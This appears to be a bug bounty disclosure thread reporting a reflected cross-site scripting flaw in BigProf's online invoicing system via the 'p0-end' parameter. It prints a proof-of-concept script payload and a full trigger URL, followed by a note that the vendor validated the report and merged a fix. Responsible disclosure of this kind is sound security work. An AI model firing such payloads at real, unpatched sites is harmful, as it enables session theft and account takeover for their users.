Cross-site Scripting (XSS) - Generic in bigprof-software/online-invoicing-system

Valid

Reported on

Mar 26th 2021


✍️ Description

A cross-site scripting (XSS) allows remote attackers to inject JavaScript via the "p0-end" Parameter

🕵️‍♂️ Proof of Concept

You can find installation instructions here: https://bigprof.com/appgini/applications/online-invoicing-system


Vulnerable Parameter: p0-end ( p1-end & p2-end end)


XSS Payload: 26/03/2021'"()%26%25<yes><ScRiPt%20>alert(2)</ScRiPt>


Once its installed sucessfully, Visit below POC link to trigger XSS:

https://localhost/app/hooks/summary-reports-invoices-0.php?apply=1&comparison-period-1=1&comparison-period-2=1&order-by=label&p0-end=26/03/2021'"()%26%25<yes><ScRiPt%20>alert(2)</ScRiPt>&p0-start=01/03/2021&p1-end=26/02/2021&p1-start=01/02/2021&p2-end=26/03/2020&p2-start=01/03/2020&radio-label-align=text-right&radio-value-align=text-left&sorting-order=desc



p0-end

💥 Impact

With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.

BigProf Software validated this vulnerability a year ago
Piyush Patil has been awarded the disclosure bounty
The fix bounty is now up for grabs
BigProf Software confirmed that a fix has been merged on f839f7 a year ago
BigProf Software has been awarded the fix bounty
Piyush Patil
9 months ago

Researcher


Hi @BigProf Sofware, Can you request for CVE?

to join this conversation